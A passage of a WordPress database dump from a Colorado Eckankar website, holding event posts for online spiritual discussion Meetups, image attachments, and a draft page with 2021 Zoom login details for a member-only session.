03:42:49','','heart-in-hand','','inherit','closed','closed','','heart-in-hand','','','2021-02-24 20:42:49','2021-02-25 03:42:49','',263901,'https://eckankar-colorado.org/wp-content/uploads/2021/02/heart-in-hand.jpg',0,'attachment','image/jpeg',0),(263913,2,'2021-02-24 21:08:39','2021-02-25 04:08:39','<p><span style=\"font-size: 25pt; color: #f28a27;\">Dreams are real! </span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>They are a way to tap into higher perspectives on what matters to you today. In this Meetup, we will discuss how to awaken to your dreams, remember them more effectively, explore their spiritual meaning, and benefit from them in your daily life.</strong></span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt; color: #666666;\">“Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.”</span><br />\r\n<span style=\"font-size: 11pt; color: #666666;\">- Harold Klemp, <em>The Art of Spiritual Dreaming</em></span></p>\r\n<p><span style=\"font-size: 12pt;\">The Meetup is based on this webpage: <a href=\"https://www.eckankar.org/experience/dreams/\" target=\"_blank\" rel=\"noopener\">Dreams and their Spiritual Meaning – A Doorway to Inner Truth</a><br />\r\n</span></p>\r\n<p><span style=\"font-size: 12pt;\">Please feel free to review the page before the Meetup and explore the tools provided there for remembering, interpreting, and benefiting from your dreams. Bring your questions, comments, and experiences to discuss during the Meetup!</span></p>\r\n<p><span style=\"font-size: 12pt;\">RSVP to attend, you will see the link.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/276566738/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - Dreams and Their Spiritual Meaning','','publish','closed','closed','','meetup-online-event-dreams-and-their-spiritual-meaning','','','2021-02-24 21:17:28','2021-02-25 04:17:28','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263913',0,'tribe_events','',0),(263914,2,'2021-02-24 21:07:50','2021-02-25 04:07:50','','dreaming-1','','inherit','closed','closed','','dreaming-1','','','2021-02-24 21:07:50','2021-02-25 04:07:50','',263913,'https://eckankar-colorado.org/wp-content/uploads/2021/02/dreaming-1.jpg',0,'attachment','image/jpeg',0),(263922,0,'2021-02-25 00:35:05','2021-02-25 07:35:05','','','','publish','closed','closed','','263922','','','2021-02-25 00:35:05','2021-02-25 07:35:05','',0,'https://eckankar-colorado.org/nf_sub/263922/',0,'nf_sub','',0),(263923,2,'2021-02-25 09:21:13','2021-02-25 16:21:13','<p><strong><span style=\"font-size: 18pt; color: #f28a27;\">Do you want to open yourself to the miracles hidden in life’s challenges?</span></strong></p>\r\n<p><strong><span style=\"font-size: 18pt; color: #f28a27; line-height: 1.3em;\">Have you experienced miracles?</span></strong></p>\r\n<p><strong><span style=\"font-size: 16pt; line-height: 0.6;\"><br />\r\nAre you looking for a conversation with others who recognize the miracles that happen each day?</span></strong></p>\r\n<p style=\"padding-left: 40px;\"><br />\r\n<span style=\"color: #666666; font-size: 12pt;\">“The kind of miracles reported in biblical times still happen today, all the time. All you need to do to recognize and benefit from these gifts of the Holy Spirit is to open your consciousness.”</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"color: #666666; font-size: 12pt;\">“What if a tragedy occurs and God did not step in to avert it? No miracle? Sometimes there is, but the miracle is in how the victim responds spiritually to the tragedy. No one is immune from troubles; this is earth, you must remember.”</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"color: #666666; font-size: 12pt;\">—Quotes by Harold Klemp in the<em><a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_july2011.pdf\" target=\"_blank\" rel=\"noopener\"> Spiritual Wisdom Journal</a> </em>referenced below.<br />\r\n<br />\r\n</span></p>\r\n<p><span style=\"font-size: 12pt;\">Open your consciousness to recognize the miracles in your life! Accept the invitation to embark on a spiritual adventure that will carry you through these uncertain times and beyond. Explore how to tap into the guidance of the Holy Spirit. Discover miracles that open you to love and joy each day.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Participants in this discussion can choose to share, ask questions or just listen as others tell of the miracles in their own lives. The steps taken to open one’s consciousness to miracles will also be shared. The discussion will be based on participant’s experience and content from the ECKANKAR Spiritual Wisdom Journal titled “Miracles in Uncertain Times.”</span></p>\r\n<p><span style=\"font-size: 12pt;\">During the discussion you will have the opportunity to listen or chant HU a love song to God. HU is an undirected prayer that can open your consciousness to the message that the Holy Spirit has for you. It is not meant to change your current beliefs but to enhance them.</span></p>\r\n<p><span style=\"font-size: 12pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p><span style=\"font-size: 12pt;\">If you want a greater understanding of how miracles occur read about a helicopter pilot’s lifesaving miracle and try the spiritual exercise provided in the Spiritual Wisdom Journal: “<em>Miracles in Uncertain Times</em>”.</span></p>\r\n<p><span style=\"font-size: 12pt;\">This journal, focused on spiritual survival in changing times, can be read online or downloaded free at: <em><a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_july2011.pdf\" target=\"_blank\" rel=\"noopener\">Spiritual Wisdom Journal</a></em>.<br />\r\n</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofGolden/events/276569105/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - Spiritual Discussion: <br>Miracles in Uncertain Times','','publish','closed','closed','','meetup-online-event-spiritual-discussion-miracles-in-uncertain-times','','','2021-02-25 09:36:48','2021-02-25 16:36:48','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263923',0,'tribe_events','',0),(263924,2,'2021-02-25 09:20:06','2021-02-25 16:20:06','','seeker-on-hill','','inherit','closed','closed','','seeker-on-hill','','','2021-02-25 09:20:06','2021-02-25 16:20:06','',263923,'https://eckankar-colorado.org/wp-content/uploads/2021/02/seeker-on-hill.jpg',0,'attachment','image/jpeg',0),(263930,2,'2021-02-25 09:32:15','2021-02-25 16:32:15','<p><strong><span style=\"font-size: 18pt; color: #f28a27;\">Do you want to open yourself to the miracles hidden in life’s challenges?</span></strong></p>\r\n<p><strong><span style=\"font-size: 18pt; color: #f28a27; line-height: 1.3em;\">Have you experienced miracles?</span></strong></p>\r\n<p><strong><span style=\"font-size: 16pt; line-height: 0.6;\"><br />\r\nAre you looking for a conversation with others who recognize the miracles that happen each day?</span></strong></p>\r\n<p style=\"padding-left: 40px;\"><br />\r\n<span style=\"color: #666666; font-size: 12pt;\">“The kind of miracles reported in biblical times still happen today, all the time. All you need to do to recognize and benefit from these gifts of the Holy Spirit is to open your consciousness.”</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"color: #666666; font-size: 12pt;\">“What if a tragedy occurs and God did not step in to avert it? No miracle? Sometimes there is, but the miracle is in how the victim responds spiritually to the tragedy. No one is immune from troubles; this is earth, you must remember.”</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"color: #666666; font-size: 12pt;\">—Quotes by Harold Klemp in the<em><a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_july2011.pdf\" target=\"_blank\" rel=\"noopener\"> Spiritual Wisdom Journal</a> </em>referenced below.<br />\r\n<br />\r\n</span></p>\r\n<p><span style=\"font-size: 12pt;\">Open your consciousness to recognize the miracles in your life! Accept the invitation to embark on a spiritual adventure that will carry you through these uncertain times and beyond. Explore how to tap into the guidance of the Holy Spirit. Discover miracles that open you to love and joy each day.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Participants in this discussion can choose to share, ask questions or just listen as others tell of the miracles in their own lives. The steps taken to open one’s consciousness to miracles will also be shared. The discussion will be based on participant’s experience and content from the ECKANKAR Spiritual Wisdom Journal titled “Miracles in Uncertain Times.”</span></p>\r\n<p><span style=\"font-size: 12pt;\">During the discussion you will have the opportunity to listen or chant HU a love song to God. HU is an undirected prayer that can open your consciousness to the message that the Holy Spirit has for you. It is not meant to change your current beliefs but to enhance them.</span></p>\r\n<p><span style=\"font-size: 12pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p><span style=\"font-size: 12pt;\">If you want a greater understanding of how miracles occur read about a helicopter pilot’s lifesaving miracle and try the spiritual exercise provided in the Spiritual Wisdom Journal: “<em>Miracles in Uncertain Times</em>”.</span></p>\r\n<p><span style=\"font-size: 12pt;\">This journal, focused on spiritual survival in changing times, can be read online or downloaded free at: <em><a href=\"https://www.spiritualwisdomjournal.org/Archives/swj_july2011.pdf\" target=\"_blank\" rel=\"noopener\">Spiritual Wisdom Journal</a></em>.<br />\r\n</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofGolden/events/276569092/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - Spiritual Discussion: <br>Miracles in Uncertain Times','','publish','closed','closed','','meetup-online-event-spiritual-discussion-miracles-in-uncertain-times-2','','','2021-02-25 09:39:31','2021-02-25 16:39:31','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263930',0,'tribe_events','',0),(263941,2,'2021-02-25 15:13:41','2021-02-25 22:13:41','<p><strong><span style=\"font-size: 14pt;\">- This Is A Member Only Event -<br />\r\n</span></strong></p>\r\n<p><span style=\"font-size: 24pt; color: #f28a27;\">You Are Invited To Join Us For A Satsang Intensive!  </span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong><span style=\"font-size: 14pt;\">This creative new format was introduced in the December 2020 <em>Mystic World</em>.</span></strong></span></p>\r\n<p><span style=\"font-size: 14pt;\"><span style=\"font-size: 12pt;\">The session is based on the important spiritual principle: True Contemplation of the ECK Works.</span> </span></p>\r\n<p><span style=\"font-size: 12pt;\">This event includes one hour of deep exploration of a concept in the ECK works, which will be introduced at the intensive Satsang session.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The format allows us to dive deeper into our spiritual exploration through a combination of individual reflection and small group discussion, exploring with the Inner Master for a better understanding of the spiritual subject.</span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>Date:</strong> Sunday, March 21, 2021</span><br />\r\n<span style=\"font-size: 12pt;\"><strong>Time:</strong> 10:30 a.m. to 11:30 a.m.<br />\r\n</span><span style=\"font-size: 12pt;\"><strong>Format</strong>: Online Zoom Meeting</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\"><a class=\"btn btn-rounded btn-small-caps btn-raised btn-color-1\" href=\"https://eckankar-colorado.org/resa-faq/satsang-intensive-zoom-login-information/\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Get \'Satsang Intensive\' Zoom Login Info</a></span></strong></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>Or, look for this Zoom login information in the March edition of the \'<em>ECK in Colorado Members Newsletter</em></strong>\'</span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>All Utah and Colorado members of ECKANKAR are welcome! Please do not invite people from areas outside Utah and Colorado. <br />\r\n</strong></span></p>','ONLINE ECK MEMBER EVENT - Satsang Intensive:<BR>True Contemplation of the ECK Works','','publish','closed','closed','','online-eck-member-event-satsang-intensivetrue-contemplation-of-the-eck-works','','','2021-03-06 12:35:49','2021-03-06 19:35:49','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263941',0,'tribe_events','',0),(263943,2,'2021-02-25 15:12:56','2021-02-25 22:12:56','','setting-sun-river','','inherit','closed','closed','','setting-sun-river','','','2021-02-25 15:12:56','2021-02-25 22:12:56','',263941,'https://eckankar-colorado.org/wp-content/uploads/2021/02/setting-sun-river.jpg',0,'attachment','image/jpeg',0),(263952,2,'2021-02-25 15:34:07','2021-02-25 22:34:07','<p><span style=\"font-size: 19pt; color: #f28a27;\">Do you want to tap into your deepest creativity as Soul? </span></p>\r\n<p><span style=\"font-size: 19pt; color: #f28a27; line-height: 1.5em;\">Would you like to know how to rise above your circumstances and see yourself as a powerful spark of the Divine?</span></p>\r\n<p><span style=\"font-size: 13pt;\"><strong><span style=\"font-size: 14pt;\">Do you wonder if there is a deeper meaning and truth to your life?</span> </strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">If you answered yes to any of these questions, this ECK Light &amp; Sound Service will open the door to allow you to see yourself in a whole new light as the powerful creator of your own life and all of the experiences in it.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Harold Klemp in his book, The Sound of Soul, says, “Soul exists because God loves It. You are Soul. In Its pure form, nothing is more elegant or regal than Soul, for it is the handiwork of the Creator. Yet life is a mystery until we begin to understand that we can be the creators of our own world. In truth, what we are today is a creation of that which we made from the past. There is a way to change the future. Sing HU, this ancient name for God. Open yourself to the guidance, insights, love, and wonder of Divine Spirit raining Its blessings into your life. Silently say, “Thy will be done” with all your trust and gratitude.”</span></p>\r\n<p><span style=\"font-size: 12pt;\">Welcome to All.</span></p>\r\n<p><span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The Zoom link will be provided to those people who RSVP.</span></p>\r\n<p><span style=\"font-size: 12pt;\">There is never a charge for this event.</span></p>\r\n<!-- Hide for use of Events Calendar Registration\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/276584588/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n -->','ONLINE EVENT - ECK Light & Sound Service <br>\'The Creative Power of Soul\'','','publish','closed','closed','','meetup-online-event-the-creative-power-of-souleck-light-sound-service','','','2021-03-15 10:25:10','2021-03-15 16:25:10','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263952',0,'tribe_events','',0),(263953,2,'2021-02-25 15:32:26','2021-02-25 22:32:26','','snowmtn-eagle','','inherit','closed','closed','','snowmtn-eagle','','','2021-02-25 15:32:26','2021-02-25 22:32:26','',263952,'https://eckankar-colorado.org/wp-content/uploads/2021/02/snowmtn-eagle.jpg',0,'attachment','image/jpeg',0),(263960,2,'2021-02-27 10:09:57','2021-02-27 17:09:57','','','','publish','closed','closed','','263960','','','2021-02-27 10:09:57','2021-02-27 17:09:57','',0,'https://eckankar-colorado.org/nf_sub/263960/',0,'nf_sub','',0),(263963,2,'2021-02-27 10:17:26','2021-02-27 17:17:26','','','','publish','closed','closed','','263963','','','2021-02-27 10:17:26','2021-02-27 17:17:26','',0,'https://eckankar-colorado.org/nf_sub/263963/',0,'nf_sub','',0),(263964,2,'2021-02-27 10:19:53','2021-02-27 17:19:53','','','','publish','closed','closed','','263964','','','2021-02-27 10:19:53','2021-02-27 17:19:53','',0,'https://eckankar-colorado.org/nf_sub/263964/',0,'nf_sub','',0),(263965,2,'2021-02-27 10:21:59','2021-02-27 17:21:59','','','','publish','closed','closed','','263965','','','2021-02-27 10:21:59','2021-02-27 17:21:59','',0,'https://eckankar-colorado.org/nf_sub/263965/',0,'nf_sub','',0),(263966,2,'2021-02-27 10:25:06','2021-02-27 17:25:06','','','','publish','closed','closed','','263966','','','2021-02-27 10:25:06','2021-02-27 17:25:06','',0,'https://eckankar-colorado.org/nf_sub/263966/',0,'nf_sub','',0),(263967,2,'2021-02-27 10:29:54','2021-02-27 17:29:54','','','','publish','closed','closed','','263967','','','2021-02-27 10:29:54','2021-02-27 17:29:54','',0,'https://eckankar-colorado.org/nf_sub/263967/',0,'nf_sub','',0),(263968,2,'2021-02-27 10:35:55','2021-02-27 17:35:55','','','','publish','closed','closed','','263968','','','2021-02-27 10:35:55','2021-02-27 17:35:55','',0,'https://eckankar-colorado.org/nf_sub/263968/',0,'nf_sub','',0),(264020,2,'2021-03-06 08:00:06','2021-03-06 15:00:06','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 68px; padding-bottom: 16px;\"></div>\r\n</div>\r\n</div>\r\n<div style=\"padding-bottom: 100px;\" class=\"tmpl-team-12 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"margin-top: 0px; padding-top: 0px; padding-bottom: 13px; background-color: #d9e5f6;\">\r\n<div class=\"col-md-1 col-sm-1 col-xs-12\">\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n<div class=\"col-md-4 col-xs-12 col-sm-5 text-center\">\r\n<p class=\"\" style=\"line-height: 1em; margin: -14px 0px -30px;\"><img class=\"alignnone size-full wp-image-264039 bg-img bg-img-square\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/03/mountain-eagle-zoomlogin-3.jpg\" alt=\"\" width=\"383\" height=\"547\"></p>\r\n</div>\r\n<div class=\"col-md-6 col-sm-1 col-xs-12\">\r\n<p class=\"\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">&nbsp;</p>\r\n<p class=\"h3\" style=\"font-family: Raleway; font-weight: 400; font-size: 35px; text-transform: capitalize; color: #23507d;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\"><strong>Satsang Intensive - Online Event<br>\r\n</strong></p>\r\n<p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px; margin-left: 24px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span style=\"color: #23507d;\">Date:</span></strong> Sunday, March 21, 2021<br>\r\n<span style=\"color: #23507d;\"><strong>Time</strong></span>: 10:30 a.m. to 11:30 a.m.<br>\r\n<span style=\"color: #23507d;\"><strong>Format</strong></span>: Online Zoom Meeting</p>\r\n<p class=\"\" style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; margin-bottom: 0px; margin-top: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Zoom Login Information:</p>\r\n<p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 16px; margin-top: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>The Free Zoom App is recommended for the best user experience.</b> This App will give you a more stable connection than using the browser link below. You can download the Zoom App here (Zoom Client for Meetings): <a class=\"moz-txt-link-freetext\" href=\"https://zoom.us/download\">https://zoom.us/download</a></p>\r\n<p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"color: #23507d;\"><strong>Meeting ID</strong>:</span>&nbsp;858 2786 3066 <br>\r\n<span style=\"color: #23507d;\"><strong>Passcode</strong>:</span>&nbsp;474824</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Join Zoom Meeting From Browser:</b></p>\r\n<p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 16px; margin-top: -3px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">https://us02web.zoom.us/j/85827863066?pwd=S21JRCtyQWxBSm5YdUFDWkxhdjdJZz09</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Dial-in number - (for those who need to join by phone)</strong>:</p>\r\n<p class=\"\" style=\"font-size: 16px; font-family: Open Sans; font-weight: 400; margin-top: -3px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">1-346-248-7799 (for those who need to join by phone)</p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Satsang Intensive - Zoom Login Information','','draft','closed','closed','','satsang-intensive-zoom-login-information','','','2021-09-23 15:12:57','2021-09-23 21:12:57','',79666,'https://eckankar-colorado.org/?page_id=264020',0,'page','',0),(264024,2,'2021-03-06 08:00:06','2021-03-06 15:00:06',' ','','','publish','closed','closed','','264024','','','2021-03-06 08:00:06','2021-03-06 15:00:06','',0,'https://eckankar-colorado.org/264024/',32,'nav_menu_item','',0),(264039,2,'2021-03-06 08:44:59','2021-03-06 15:44:59','','mountain-eagle-zoomlogin-3','','inherit','closed','closed','','mountain-eagle-zoomlogin-3','','','2021-03-06 08:44:59','2021-03-06 15:44:59','',264020,'https://eckankar-colorado.org/wp-content/uploads/2021/03/mountain-eagle-zoomlogin-3.jpg',0,'attachment','image/jpeg',0),(264081,2,'2021-03-06 11:43:35','2021-03-06 18:43:35','','mountain-eagle-zoomlogin-5-362-517','','inherit','closed','closed','','mountain-eagle-zoomlogin-5-362-517','','','2021-03-06 11:43:35','2021-03-06 18:43:35','',68102,'https://eckankar-colorado.org/wp-content/uploads/2021/03/mountain-eagle-zoomlogin-5-362-517.jpg',0,'attachment','image/jpeg',0),(264126,2,'2021-03-10 20:15:39','2021-03-11 03:15:39','<p><span style=\"font-size: 16pt; color: #666666; font-family: georgia, palatino, serif;\">“<em>Showers of love rain down upon us simply because we are Soul, a divine spark of God. Its Voice, which showers the love, is the pure Light and Sound…The Light and Sound are God’s way to communicate directly with us. They help develop our creativity, which makes us godlike.</em>”  </span><span style=\"font-size: 14pt; color: #666666;\"><span style=\"font-size: 12pt;\"><em>ECK Wisdom on Inner Guidance   </em>—Harold Klemp, 6</span><br />\r\n<br />\r\n</span></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 13pt;\">If you’re unhappy, could you open yourself to the possibility that there is something better?<br />\r\n</span></strong><strong><span style=\"font-size: 13pt;\">Have you ever found that your attitude holds the key to whether a problem will be easy or difficult?<br />\r\n</span></strong></span><strong><span style=\"color: #f28a27; font-size: 13pt;\"><span style=\"color: #23507d;\">Would you like to find comfort when facing daily challenges or decisions?</span> <br />\r\n</span></strong></p>\r\n<hr style=\"margin-top: 10px; margin-bottom: 15px; border-top: 3px double #8c8b8b;\" />\r\n<p><span style=\"font-size: 13pt;\">Other Souls just like you have found ways to pay better attention to and discover solutions through inner guidance.</span></p>\r\n<p><span style=\"font-size: 13pt;\">In <em>ECK Wisdom on Inner Guidance</em>, Harold Klemp writes on page 37,</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"color: #666666; font-family: georgia, palatino, serif;\"><em><span style=\"font-size: 14pt;\">“Listen to God’s Voice. Respond to it spiritually and know that despite every appearance to the contrary, all is well and in its rightful place.”</span></em></span></p>\r\n<p><span style=\"font-size: 13pt;\">Answers may come to you through an animal, another person, an angel, spiritual guide or master, or straight from the Holy Spirit as Light and Sound.</span></p>\r\n<p><span style=\"font-size: 13pt;\">There are tools to awaken you to the hidden ways God speaks to you if you are willing to open your heart to love.</span></p>\r\n<p><span style=\"font-size: 13pt;\">In this discussion, we’ll discuss learning to listen to inner guidance and consider our next steps in our evolving relationship with divine love to gain greater spiritual freedom. There will be an opportunity to try a brief spiritual exercise to help us.</span></p>\r\n<p><span style=\"font-size: 13pt;\">All are welcome.</span></p>\r\n<p><span style=\"font-size: 13pt;\">The meeting will occur via ZOOM. Please RSVP to get the link.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/Spiritual-Experiences-Group-of-Lone-Tree/events/276858946/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT -  Who Can I Trust When All Else Fails? <br>(An ECKANKAR Perspective)','','publish','closed','closed','','meetup-online-event-who-can-i-trust-when-all-else-fails-an-eckankar-perspective','','','2021-03-31 14:51:53','2021-03-31 20:51:53','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264126',0,'tribe_events','',0),(264127,2,'2021-03-10 20:14:53','2021-03-11 03:14:53','','universe-rose','','inherit','closed','closed','','universe-rose','','','2021-03-10 20:14:53','2021-03-11 03:14:53','',264126,'https://eckankar-colorado.org/wp-content/uploads/2021/03/universe-rose.jpg',0,'attachment','image/jpeg',0),(264153,0,'2021-03-11 03:24:35','2021-03-11 10:24:35','','','','publish','closed','closed','','264153','','','2021-03-11 03:24:35','2021-03-11 10:24:35','',0,'https://eckankar-colorado.org/nf_sub/264153/',0,'nf_sub','',0),(264154,0,'2021-03-13 15:57:02','2021-03-13 22:57:02','','','','publish','closed','closed','','264154','','','2021-03-13 15:57:02','2021-03-13 22:57:02','',0,'https://eckankar-colorado.org/nf_sub/264154/',0,'nf_sub','',0),(264172,0,'2021-03-17 05:50:15','2021-03-17 11:50:15','','','','publish','closed','closed','','264172','','','2021-03-17 05:50:15','2021-03-17 11:50:15','',0,'https://eckankar-colorado.org/nf_sub/264172/',0,'nf_sub','',0),(264173,0,'2021-03-17 21:50:12','2021-03-18 03:50:12','','','','publish','closed','closed','','264173','','','2021-03-17 21:50:12','2021-03-18 03:50:12','',0,'https://eckankar-colorado.org/nf_sub/264173/',0,'nf_sub','',0),(264174,2,'2021-03-18 10:16:44','2021-03-18 16:16:44','<p><span style=\"color: #f28a27; font-size: 18pt;\">In this Meetup, you will learn how to recognize your Soul Travel experiences, benefit from them in your daily life, and awaken to more of the love, wisdom, and creative powers that are already within your heart.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>OPTIONAL</strong> - to enrich and deepen your ‘Soul Travel’ Meetup discussion experience, go to <a class=\"link\" title=\"https://www.eckankar.org/experience/soul-travel/\" href=\"https://www.eckankar.org/experience/soul-travel/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What Is Soul Travel?</a> and explore.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Bring your questions, comments, and experiences to discuss how to expand your awareness naturally and explore the unlimited worlds of Soul.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This is the third of six online ‘<strong>A Journey Like No Other</strong>\' Meetups, sponsored by Eckankar - The Path of Spiritual Freedom – in Colorado.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group is a spiritual resource for people of all faiths and beliefs. Eckankar is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/276983807/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - A Journey Like No Other: Soul Travel','','publish','closed','closed','','meetup-online-eventtemplate','','','2021-03-18 15:26:41','2021-03-18 21:26:41','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=264174',0,'tribe_events','',0),(264204,2,'2021-03-18 15:26:10','2021-03-18 21:26:10','','soul-travel-2 souls','','inherit','closed','closed','','soul-travel-2-souls','','','2021-03-18 15:26:10','2021-03-18 21:26:10','',264174,'https://eckankar-colorado.org/wp-content/uploads/2021/03/soul-travel-2-souls.jpg',0,'attachment','image/jpeg',0),(264209,2,'2021-03-21 12:43:53','2021-03-21 18:43:53','<p><span style=\"font-size: 18pt; color: #f28a27;\">- Do you want to discover a secret key to happiness?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #f28a27; line-height: 0.6;\">- Have you wondered why life is a mixture of happy and unhappy events?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #f28a27; line-height: 0.6;\">- Do you wish you had more happiness in your life?</span></p>\r\n<p><span style=\"font-size: 13pt;\"><strong><br />\r\nSome people seem to be happy. Others appear to walk under a cloud of bad luck. Both of these groups have problems. What makes the difference? Which life would you like to live?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Your path to happiness is uniquely suited to you. The secret key is within. You and only you can take your next step to find it. Know that you do not have to make this journey alone. Inner guidance is always there for you to tap.<br />\r\n<br />\r\n</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt; color: #666666;\">“Start where you are, begin with what you have. Ask, “Where am I today? How can I build my own life with the help of the ECK (the Holy Spirit)?”</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt; color: #666666;\">“Once you decide to act on it, you find out that there are a lot of other things that come with a decision like this. Change means going from one state of consciousness to another.”</span><br />\r\n<br />\r\n<span style=\"font-size: 11pt; color: #666666; padding-left: 40px;\">—By Harold Klemp, from the <em>Spiritual Wisdom Journal -</em> “What is True Happiness?”</span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\">Participants in this event can choose to take part in the discussion or just listen as others describe their progress in both the physical and invisible worlds in pursuit of true happiness. The discussion will be based on participant’s experience and the content from the ECKANKAR Spiritual Wisdom Journal focused on “What is true happiness?”</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">During the discussion you will have the opportunity to participate in a spiritual exercise, the <strong>HU</strong>, a love song to God. <strong>HU</strong> is an undirected prayer that can open your consciousness to the guidance the Holy Spirit has for you. It is not meant to change your current beliefs but to enhance them.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This event is sponsored by ECKANKAR, the path of spiritual freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">You may wish to explore the Spiritual Wisdom Journal titled “What is True Happiness?” It includes articles, stories, and a spiritual exercise to open yourself to love. This document can be read online or downloaded free at:</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\"><a class=\"link\" title=\"https://www.spiritualwisdomjournal.org/Archives/swj_jul2019.pdf\" href=\"https://www.spiritualwisdomjournal.org/Archives/swj_jul2019.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Wisdom Journal</a></span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofGolden/events/277068286/\" 